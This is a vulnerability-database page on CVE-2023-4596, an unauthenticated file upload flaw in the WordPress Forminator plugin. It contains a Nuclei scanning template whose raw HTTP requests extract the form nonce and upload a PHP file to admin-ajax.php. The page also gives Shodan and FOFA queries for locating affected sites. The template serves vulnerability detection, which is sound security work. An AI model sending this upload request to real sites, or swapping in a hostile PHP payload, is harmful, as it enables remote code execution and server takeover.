| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Exploit for CVE-2023-4596 | 18 May 202401:39 | – | githubexploit | |
| Exploit for CVE-2023-4596 | 6 Aug 202408:12 | – | githubexploit | |
| The vulnerability of the upload_post_image() function in the Forminator plugin of the WordPress content management system allows a hacker to bypass security restrictions and execute arbitrary code. | 7 Sep 202300:00 | – | bdu_fstec | |
| CVE-2023-4596 | 30 Aug 202322:45 | – | circl | |
| WordPress plugin Forminator 代码问题漏洞 | 30 Aug 202300:00 | – | cnnvd | |
| CVE-2023-4596 | 30 Aug 202301:45 | – | cve | |
| CVE-2023-4596 Forminator <= 1.24.6 - Unauthenticated Arbitrary File Upload | 30 Aug 202301:45 | – | cvelist | |
| CVE-2023-4596 | 30 Aug 202302:15 | – | nvd | |
| WordPress Forminator Plugin < 1.25.0 Arbitrary File Upload Vulnerability | 6 Sep 202300:00 | – | openvas | |
| WordPress Forminator Plugin <= 1.24.6 is vulnerable to Arbitrary File Upload | 29 Aug 202300:00 | – | patchstack |
id: CVE-2023-4596
info:
name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload
author: E1A
severity: critical
description: |
The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
impact: |
Unauthenticated attackers can upload arbitrary files including malicious PHP code, potentially leading to complete server compromise and remote code execution.
remediation: |
Update the Forminator plugin to version 1.24.7 or later which includes proper file type validation.
reference:
- https://www.exploit-db.com/exploits/51664
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
- https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
- https://github.com/E1A/CVE-2023-4596
- https://nvd.nist.gov/vuln/detail/CVE-2023-4596
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-4596
cwe-id: CWE-434
epss-score: 0.12749
epss-percentile: 0.95777
cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: incsub
product: forminator
framework: wordpress
shodan-query: http.html:/wp-content/plugins/forminator
fofa-query: body=/wp-content/plugins/forminator
publicwww-query:
- /wp-content/plugins/Forminator
- /wp-content/plugins/forminator
tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub,vkev,vuln
variables:
string: "CVE-2023-4596"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="textarea-1"
{{randstr}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="phone-1"
{{rand_int(10)}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="email-1"
[email protected]
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="name-1"
{{randstr}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="forminator_nonce"
{{forminator_nonce}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="form_id"
{{form_id}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="current_url"
{{BaseURL}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="action"
forminator_submit_form_custom-forms
------WebKitFormBoundaryBLOYSueQAdgN2PRe
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- 'Upload file</label>'
- 'forminator-field-upload'
condition: and
- type: word
part: body_2
words:
- '{"success":true'
- '"form_id":"{{form_id}}"'
- '"behav'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: forminator_nonce
part: body
group: 1
regex:
- 'name="forminator_nonce" value="([a-z0-9]+)" \/>'
internal: true
- type: regex
name: form_id
part: body
group: 1
regex:
- 'name="form_id" value="([0-9]+)">'
internal: true
# digest: 4a0a0047304502205ea9f7fa432bd2074f5761bde1a81cdc6b7a8b62f8a64c51d729fc749db2363d022100d15f59f59799112534b9f4696cb9751066c904b328499622350b54d20fd06bd1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation